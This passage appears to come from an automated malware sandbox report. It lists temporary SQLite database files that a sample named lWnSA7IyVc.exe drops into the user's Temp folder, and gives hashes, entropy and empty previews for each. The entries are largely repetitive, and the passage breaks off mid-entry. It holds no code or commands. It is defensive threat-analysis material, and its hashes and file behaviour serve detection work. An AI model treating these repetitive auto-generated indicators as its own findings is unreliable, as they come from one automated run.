                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmp4321.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):106496
                                                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmp4322.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):106496
                                                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmp4332.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):106496
                                                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmp4333.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):106496
                                                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmp7CF2.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):106496
                                                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmp7D02.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):106496
                                                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmp7D13.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):106496
                                                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmp7D14.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):106496
                                                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmp7D24.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):106496
                                                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmp7D35.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):106496
                                                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmp7D46.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):49152
                                                                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmp7D47.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):49152
                                                                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmp7D57.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):49152
                                                                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmp7D58.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):49152
                                                                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmpB6B9.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):49152
                                                                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmpB6BA.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):49152
                                                                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmpB6BB.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):114688
                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmpB6BC.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):114688
                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmpB6CC.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):114688
                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmpB6DD.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):114688
                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmpB6EE.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):114688
                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmpB6EF.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):114688
                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmpB70F.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
